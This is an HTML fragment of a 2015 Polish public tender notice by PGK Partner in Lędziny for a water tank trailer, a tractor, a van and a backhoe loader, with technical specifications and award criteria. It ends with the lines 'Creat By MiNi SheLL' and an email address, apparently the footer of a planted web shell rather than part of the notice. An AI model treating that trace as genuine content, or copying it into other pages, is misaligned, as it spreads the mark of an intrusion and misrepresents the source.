<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z zapisami art. 144 ust.1 ustawy zakazuje się zmian istotnych postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba, że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
2.Zgodnie z treścią art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty w następujących przypadkach:
1)zmiany statusu prawnego powodującego konieczność zmiany treści umowy,
2)zmiany unormowań prawnych powszechnie obowiązujących, które będą miały wpływ na realizację umowy;
3)zmiany terminów płatności;
Nie stanowią zmiany umowy w rozumieniu art. 144 ustawy Pzp zmiany formalno-organizacyjne, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy, zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami.
Wszelkie zmiany muszą być dokonywane z zachowaniem przepisu art. 140 ust. 1 Pzp i art. 140 ust. 3 Pzp stanowiącego, iż umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawartego w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://jrp.pgk-partner.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej Partner Sp. z o.o.
ul. Lędzińska 47, 43-143 Lędziny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2015 godzina 10:00, miejsce: Przedsiębiorstwo Gospodarki Komunalnej Partner Sp. z o.o.
ul. Lędzińska 47, 43-143 Lędziny, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków UE w ramach Programu Operacyjnego Infrastruktura I Środowisko, Projekt: Uporządkowanie Gospodarki Ściekowej w Gminie Lędziny..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostarczenie cysterny do przewozu wody pitnej (S2).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zakup i dostarczenie fabrycznie nowej cysterny do przewozu wody pitnej, zabudowanej na przyczepie, spełniającej wymagania pojazdu dopuszczonego do poruszania się po drogach publicznych, zgodnie z obowiązującymi przepisami ustawy Prawo o Ruchu Drogowym (z dnia 20.06.1997r. jt. Dz. U. z 2012r. poz. 1137, z późn. zm.), o parametrach nie gorszych niż:

- rok produkcji 2015;
- 1 osiowa;
- pojemność 1000 l;
- powłoka ocynkowana z atestem na przewóz wody pitnej; 
- piktogram z oznaczeniem WODA DO PICIA;  
- cysterna stanowiąca zwartą, jednolitą konstrukcję z przyczepą;
- przyczepa wyposażona w zaczep (dostosowany do zamocowania na haku kulowym);.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.12-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Koszt przeglądów gwarancyjnych w okresie gwarancji - 5</li>
<li>3. Długość okresu gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostarczenie ciągnika rolniczego z niezbędnym osprzętem (S3)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostarczenie fabrycznie nowego ciągnika rolniczego z przyczepą, ramieniem wysięgnikowym tylnym, głowicą koszącą, spełniającego wymagania pojazdu dopuszczonego do poruszania się po drogach publicznych, zgodnie z obowiązującymi przepisami ustawy Prawo o Ruchu Drogowym (z dnia 20.06.1997r. jt. Dz. U. z 2012r. poz. 1137, z późn. zm.),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2, 34.22.30.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostarczenie samochodu do przewozu specjalistycznego sprzętu (S4).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostarczenie fabrycznie nowego samochodu typ furgon z wysokim dachem, spełniającym wymagania pojazdu dopuszczonego do poruszania się po drogach publicznych, zgodnie z obowiązującymi przepisami ustawy Prawo o Ruchu Drogowym (z dnia 20.06.1997r. jt. Dz. U. z 2012r. poz. 1137, z późn. zm.), o parametrach nie gorszych niż:

Wyposażenie: Bezpieczeństwo

- asystent bocznego wiatru;
- ABS - system zapobiegający blokowaniu kół podczas hamowania;
- elektroniczny system stabilizacji toru jazdy uwzględniający obciążenie pojazdu;
- ASR - system zapobiegający poślizgowi kół napędzanych;
- EBV - elektroniczny korektor siły hamowania;
- BAS - asystent hamowania (wspomaganie hamowania awaryjnego);
- hamulce: przednie tarczowe wentylowane, tylne tarczowe pełne;
- poduszka bezpieczeństwa kierowcy;


Nadwozie
- samonośne całkowicie stalowe, ocynkowane wszystkie drzwi, atakże maska, błotniki, podłużnice 
i poprzecznice
- boczne listwy ochronne
- wszystkie szyby termoizolacyjne
- drzwi boczne przesuwne z prawej strony
- tylne drzwi nieprzeszklone
- dach lakierowany w kolorze nadwozia
- lusterka zewnętrzne regulowane manualnie, ze zintegrowanymi kierunkowskazami

Układ przeniesienia napędu
- napęd na koła tylne

Układ kierowniczy
- hydrauliczne wspomaganie układu kierowniczego
- blokada koła kierownicy

Wyposażenie funkcjonalne
- immobiliser
- centralny zamek sterowany pilotem
- szyby w kabinie kierowcy sterowane elektrycznie
- fotel kierowcy, z pełną regulacją (zakres regulacji fotela kierowcy: regulacja wzdłużna, regulacja oparcia oraz regulacja wysokości)
- siedzenie dwuosobowe obok kierowcy 
- dźwignia zmiany biegów w formie joysticka
- schowek w desce rozdzielczej
- gniazdo 12 V w kabinie kierowcy
- koło zapasowe z koszem mocującym i zestawem narzędzi z podnośnikiem

Przestrzeń ładunkowa
- ściana działowa bez okna
- przestrzeń ładunkowa wyłożona sklejką wraz z ścianami bocznymi do wysokości dachu 
- uchwyty do mocowania ładunku w przestrzeni ładunkowej
- oświetlenie przestrzeni ładunkowej
- podłoga stalowa (jako opcja dostępne wyłożenie podłogi)

Pozostałe parametry:
- rok produkcji 2015;
- pojemność skokowa silnika min. 1900 max 2000 cm3;
- moc min. 100 kW;
- liczba cylindrów 4;
- rodzaj paliwa: olej napędowy wg DIN EN 590; 
- norma emisji spalin EEV wg dyrektywy 2005/55/WE, wydanie 2008/74/WE lub rozporządzenia WE 715/2007 Euro 5;
- filtr cząstek stałych; 
- 6-biegowa skrzynia manualna;
- napęd na tylne koła;
- przestrzeń ładunkowa 10,5 m3?0,5m3;
- boczne drzwi przesuwne szerokość /wysokość 1300/1820 mm ?50mm; 
- tylne drzwi skrzydłowe szerokość/wysokość 1565/1840 mm ?50mm;
- średnica zawracania max 14 m; 
- rozstaw osi max. 3665 mm; 
- konfiguracja siedzeń: 3 siedzenia; 
- klimatyzacja półautomatyczna z filtrem kurzu i pyłków z aktywnym węglem; 	
- radio wraz z zestawem głośnomówiącym z Bluetooth; 
- kolor biały;  
- wyposażenie dodatkowe: hak holowniczy z głowicą kulową; 
- pokrowce na siedzenia, 
- belka wraz z oświetleniem na dachu oraz logo Zamawiającego - PGK Partner Sp. z o.o.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup i dostarczenie koparko-ładowarki (S5).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zakup i dostarczenia fabrycznie nowej koparko-ładowarki kołowej, spełniającej wymagania pojazdu dopuszczonego do poruszania się po drogach publicznych, zgodnie z obowiązującymi przepisami ustawy Prawo o Ruchu Drogowym (z dnia 20.06.1997r. jt. Dz. U. z 2012r. poz. 1137, z późn. zm.), o parametrach nie gorszych niż: 

a) masa eksploatacyjna maszyny do 8200 kg;
b) długość transportowa maszyny do 5,70 m;
c) silnik wysokoprężny o mocy znamionowej min 80 KM;
d) napęd koparko-ładowarki na dwie osie, możliwość napędu na jedną oś;
e) koła jezdne: przednie 18, tylne 26;
f) przednia oś wychylna, przednie koła skrętne;
g) średnica zawracania koparko-ładowarki bez hamulca do 8,5 m;
h) skrzynia biegów manualna, cztery biegi w przód, cztery biegi  w tył; z dźwignią zmiany biegów umieszczoną w podłodze, wybór kierunku jazdy za pomocą przełącznika, umieszczonego na kolumnie kierownicy;
i) dwa niezależne układy hamowania, hamulec zasadniczy hydrauliczny, mokry, samoregulujący się;
j) system hydrauliczny umożliwiający dostosowanie wydajności układu hydraulicznego do bieżącego zapotrzebowania;
k) układ hydrauliczny zasilany pompą wielotłoczkową o wydajności min 160 l/min;
l) stabilizatory tylne niezależne, wysuwane hydraulicznie;
ł) błotniki kół przednich, skrzynka narzędziowa, 
m) immobiliser;
n) kabina operatora spełniająca wymagania konstrukcji ochronnej ROPS i FOPS z obrotowym fotelem operatora, wyciszona (poziom hałasu w kabinie nie większy niż 74 dB);

2. Osprzęt ładowarkowy koparko-ładowarki:

a)	koparko-ładowarka musi posiadać system z równoległymi siłownikami przechylania 
łyżki, zapewniający samopoziomowanie łyżki ładowarkowej;
b)	koparko-ładowarka musi posiadać układ stabilizacji łyżki ładowarkowej;
c)	łyżka ładowarkowa dzielona [otwierana], wielofunkcyjna: 6 w jednym - możliwość spychania,     ładowania, kopania, chwytania, rozściełania i wyrównywania;
d)	na łyżce muszą być zamontowane widły do palet;
e)	pojemność łyżki ładowarki 1,0 m3 z tolerancją ? 0,1 m3, szerokość łyżki do 2,5 m;
f)	 maksymalna wysokość załadunku co najmniej 3,0 m.
g)	udźwig na pełną wysokość w łyżce ładowarkowej co najmniej 2 800 kg 
h)	siła skrawania na łyżce ładowarkowej na poziomie gruntu nie mniej niż 65 kN;

3.	Osprzęt koparkowy podsiębierny koparko-ładowarki:

a)	musi posiadać możliwość przesuwu bocznego wysięgnika koparkowego;
b)	łyżka koparkowa o szerokości 600 mm ? 20 mm i pojemności 0,2 m3 ? 0,06 m3;
c)	ramię koparkowe o zmiennej długości, rozsuwane hydraulicznie (teleskopowe);
d)	maksymalna głębokość kopania co najmniej 5,90 m; 
e)	maksymalna wysokość załadunku przy złożonym ramieniu min. 3,5 m;
f)	 siła skrawania na łyżce koparkowej min. 57 kN, siła skrawania na ramieniu złożonym min. 30 kN.
g)	udźwig przy złożonym ramieniu min. 1200 kg;
h)	łyżka koparkowa skarpowa, szerokość min. 1200 mm o pojemności min. 0,12 m3;
i)	 łyżka koparkowa, szerokość 400 mm, o pojemności 0,04 m3;
j)	 szybkozłącze koparkowe;
  
4.	Wykonawca musi posiadać autoryzację producenta na terenie Polski.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 43.20.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com